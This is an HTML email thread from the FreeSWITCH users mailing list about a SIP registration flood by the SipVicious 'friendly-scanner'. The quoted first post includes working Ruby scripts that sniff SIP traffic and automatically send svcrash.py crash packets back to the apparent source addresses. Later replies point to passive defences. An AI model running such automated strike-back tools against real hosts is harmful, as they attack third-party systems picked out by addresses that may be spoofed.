<div dir="ltr">True. See <meta http-equiv="content-type" content="text/html; charset=utf-8"><a href="http://wiki.freeswitch.org/wiki/QoS">http://wiki.freeswitch.org/wiki/QoS</a> for other helpful iptable commands for rate limiting.<div>

Or, <meta http-equiv="content-type" content="text/html; charset=utf-8"><a href="http://wiki.freeswitch.org/wiki/Fail2ban#SIP_DOS_Attack">http://wiki.freeswitch.org/wiki/Fail2ban#SIP_DOS_Attack</a> for actual fail2ban-ing too many auth challanges.  (&lt;-- I have this one set)</div>

<div>Or <meta http-equiv="content-type" content="text/html; charset=utf-8"><a href="http://etel.wiki.oreilly.com/wiki/index.php/SIP_DoS/DDoS_Mitigation">http://etel.wiki.oreilly.com/wiki/index.php/SIP_DoS/DDoS_Mitigation</a> for lots of cool stuff.</div>

<div><br></div><div><a href="http://etel.wiki.oreilly.com/wiki/index.php/SIP_DoS/DDoS_Mitigation"></a>But all of these are passive, to drop packets. This thread was started as a way to actually impede the scanner...</div>

<div><br></div><div>-Avi<br><div><br><br><div class="gmail_quote">On Thu, Apr 21, 2011 at 2:10 PM, Kerem Erciyes <span dir="ltr">&lt;<a href="mailto:kerem.erciyes@gmail.com">kerem.erciyes@gmail.com</a>&gt;</span> wrote:<br>

<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">That would work until attacker defines a custom user-agent string. There has been reports of modified SipVicious code using Asterisk PBX as the agent.<div>

<div></div><div class="h5"><br><br><div class="gmail_quote">On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <span dir="ltr">&lt;<a href="mailto:denisgalvao@gmail.com" target="_blank">denisgalvao@gmail.com</a>&gt;</span> wrote:<br>


<blockquote class="gmail_quote" style="margin:0pt 0pt 0pt 0.8ex;border-left:1px solid rgb(204, 204, 204);padding-left:1ex">Nice! Thanks for sharing!<br>
<br>
Denis<br>
<br>
2011/4/20, Peter P GMX &lt;<a href="mailto:Prometheus001@gmx.net" target="_blank">Prometheus001@gmx.net</a>&gt;:<br>
<div><div></div><div>&gt; Hello all,<br>
&gt;<br>
&gt; I would like to share this with you as you may have also been affected<br>
&gt; by this threat.<br>
&gt;<br>
&gt; Yesterday we received a SPIT attack to our Freeswitch servers. We had<br>
&gt; about 50 register requests/sec. We noticed this as we saw a slight<br>
&gt; increase in the load of the Freeswitch servers. Fortunately Freeswitch<br>
&gt; can handle a huge amount of register requests so we had no denial of<br>
&gt; service.<br>
&gt;<br>
&gt; You can identify this attack by finding the following in the Register<br>
&gt; message:<br>
&gt;     User-Agent: friendly-scanner<br>
&gt;<br>
&gt; How to get rid of it:<br>
&gt; The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a<br>
&gt; nice tool &quot;svcrash.py&quot; wich can send a malformed packet back to the<br>
&gt; attacker which crashes their own Sipvicious tool. You can issue this tool by<br>
&gt;   python svcrash.py -d &lt;host of attacker&gt; -p &lt;port of attacker&gt;<br>
&gt; You will need port 5060 on your machine to work. But there is also a<br>
&gt; workaround for that. svcrash.py will show how to overcome this if your<br>
&gt; port 5060 is not available.<br>
&gt; Download it here<br>
&gt; <a href="http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz" target="_blank">http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz</a> and<br>
&gt; unpack it to a folder of your choice.<br>
&gt;<br>
&gt; I wrote a small Ruby script to send the packet back to a port range, as<br>
&gt; our attacker used some dozens of ports to send.<br>
&gt; Here is the script (Install ruby first by &quot;apt-get install ruby&quot; e.g. on<br>
&gt; Debian based systems). Put it into the sipvicious directory<br>
&gt; kill_ports.rb:<br>
&gt;<br>
&gt; #!/usr/bin/env ruby<br>
&gt; host=ARGV[0]<br>
&gt; start_port=ARGV[1].to_i<br>
&gt; end_port=ARGV[2].to_i<br>
&gt; start_port.upto(end_port) do |port|<br>
&gt;   cmd=&quot;python svcrash.py -d #{host} -p #{port}&quot;<br>
&gt;   p cmd<br>
&gt;   erg=`#{cmd}`<br>
&gt;   p erg<br>
&gt; end<br>
&gt;<br>
&gt; You now can run it by<br>
&gt; ./kill_ports.rb &lt;ip&gt; &lt;from_port&gt; &lt;to_port&gt;<br>
&gt;<br>
&gt; By using this tool we got rid of most of the SPIT messages. But after a<br>
&gt; while they started again to attack us from different ports.<br>
&gt;<br>
&gt; The next step is: Why not automate this by trying to identify host and<br>
&gt; port automatically and send back the svcrash.py packet to the sender&#39;s port?<br>
&gt;<br>
&gt; First install the pcap library<br>
&gt;     apt-get install libpcap-dev libpcap-ruby<br>
&gt;<br>
&gt; Then I wrote the following tool to automate this, it makes use of the<br>
&gt; kill_ports.rb above:<br>
&gt; strike_back.rb:<br>
&gt;<br>
&gt; #!/usr/bin/env ruby<br>
&gt; # I used some code from <a href="http://snippets.dzone.com/posts/show/5931" target="_blank">http://snippets.dzone.com/posts/show/5931</a><br>
&gt; require &#39;pcaplet&#39;<br>
&gt; require &#39;logger&#39;<br>
&gt; require &#39;timeout&#39;<br>
&gt; @timeout=3600 # max runtime: 1 hour<br>
&gt;<br>
&gt; @logfile=&#39;strike_back.log&#39;<br>
&gt; class AuditLogger &lt; Logger<br>
&gt;   def format_message(severity, timestamp, progname, msg)<br>
&gt;     puts msg<br>
&gt;     &quot;#{msg}\n&quot;<br>
&gt;   end<br>
&gt; end<br>
&gt;<br>
&gt; logfile = File.open(@logfile, &#39;a&#39;)<br>
&gt; LOGGER = AuditLogger.new(logfile)<br>
&gt; LOGGER.level = Logger::INFO<br>
&gt; search=&quot;friendly-scanner&quot;<br>
&gt; puts&quot;Searching for &#39;#{ search}&#39; in SIP packets&quot;<br>
&gt; $network = Pcaplet.new(&#39;-s 1500&#39;)<br>
&gt; $filter = Pcap::Filter.new(&#39;udp and dst port 5060&#39;, $network.capture)<br>
&gt; $network.add_filter($filter)<br>
&gt; puts &quot;Logfile: #{@logfile}&quot;<br>
&gt; puts &quot;Starting capture...&quot;<br>
&gt; begin<br>
&gt;   Timeout.timeout(@timeout) do # 3600 sec<br>
&gt;     for p in $network<br>
&gt;         header= &quot;#{Time.now.strftime(&quot;%Y-%m-%d %H:%M:%S&quot;)}<br>
&gt; #{p.src}:#{p.sport} =&gt; #{p.dst}:#{p.dport}&quot;<br>
&gt;         if $filter =~ p<br>
&gt;             #puts &quot;simple search&quot;<br>
&gt;             if p.udp_data.index(search)<br>
&gt;               LOGGER.info &quot;Kill Friendly scanner #{p.src} with Source<br>
&gt; Port #{p.sport}&quot;<br>
&gt;               cmd=&quot;./kill_ports.rb #{p.src} #{p.sport} #{p.sport}&quot;<br>
&gt;               erg=`#{cmd}`<br>
&gt;               p erg<br>
&gt;               LOGGER.info header<br>
&gt;               LOGGER.info p.udp_data<br>
&gt;             end<br>
&gt;         end<br>
&gt;     end<br>
&gt;   end<br>
&gt; rescue Timeout::Error<br>
&gt;   logfile.flush<br>
&gt;   puts &quot;Timeout - finished.&quot;<br>
&gt; end<br>
&gt;<br>
&gt; There may be a better way to code this, but at least it worked. After<br>
&gt; about 15min the number of attacks went to 0.<br>
&gt;<br>
&gt; Disclaimer: You can damage other systems by using these tools. So be<br>
&gt; carefull and use at your own risks. Do not use this tool for attacking<br>
&gt; other systems!<br>
&gt;<br>
&gt; Best regards<br>
&gt; Peter<br>
&gt;<br>
&gt; _______________________________________________<br>
&gt; FreeSWITCH-users mailing list<br>
&gt; <a href="mailto:FreeSWITCH-users@lists.freeswitch.org" target="_blank">FreeSWITCH-users@lists.freeswitch.org</a><br>
&gt; <a href="http://lists.freeswitch.org/mailman/listinfo/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/listinfo/freeswitch-users</a><br>
&gt; UNSUBSCRIBE:<a href="http://lists.freeswitch.org/mailman/options/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/options/freeswitch-users</a><br>
&gt; <a href="http://www.freeswitch.org" target="_blank">http://www.freeswitch.org</a><br>
&gt;<br>
<br>
</div></div><font color="#888888">--<br>
Enviado do meu celular<br>
</font><div><div></div><div><br>
_______________________________________________<br>
FreeSWITCH-users mailing list<br>
<a href="mailto:FreeSWITCH-users@lists.freeswitch.org" target="_blank">FreeSWITCH-users@lists.freeswitch.org</a><br>
<a href="http://lists.freeswitch.org/mailman/listinfo/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/listinfo/freeswitch-users</a><br>
UNSUBSCRIBE:<a href="http://lists.freeswitch.org/mailman/options/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/options/freeswitch-users</a><br>
<a href="http://www.freeswitch.org" target="_blank">http://www.freeswitch.org</a><br>
</div></div></blockquote></div><br><br clear="all"><br></div></div><font color="#888888">-- <br>Kerem Erciyes - Sistem Danismani<br><a href="http://keremerciyes.com" target="_blank">http://keremerciyes.com</a><br><br><br>


</font><br>_______________________________________________<br>
FreeSWITCH-users mailing list<br>
<a href="mailto:FreeSWITCH-users@lists.freeswitch.org">FreeSWITCH-users@lists.freeswitch.org</a><br>
<a href="http://lists.freeswitch.org/mailman/listinfo/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/listinfo/freeswitch-users</a><br>
UNSUBSCRIBE:<a href="http://lists.freeswitch.org/mailman/options/freeswitch-users" target="_blank">http://lists.freeswitch.org/mailman/options/freeswitch-users</a><br>
<a href="http://www.freeswitch.org" target="_blank">http://www.freeswitch.org</a><br>
<br></blockquote></div><br></div></div></div>